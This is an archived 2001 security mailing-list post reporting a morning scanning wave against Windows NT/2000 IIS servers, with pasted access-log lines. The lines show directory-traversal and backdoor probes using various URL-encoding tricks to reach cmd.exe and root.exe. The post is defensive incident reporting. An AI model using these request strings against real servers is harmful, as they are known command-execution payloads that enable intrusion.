Looks like a fair amount of traffic this morning amongst compromised NT/2k boxen. the 63.x.y.z as well as the 65.x.y.z is seeing a fair amount of traffic, similar to the following: aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 326 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 383 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333"-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404350 "-" "-" aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350"-" "-" log times are PST. -aj. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:00:58 PDT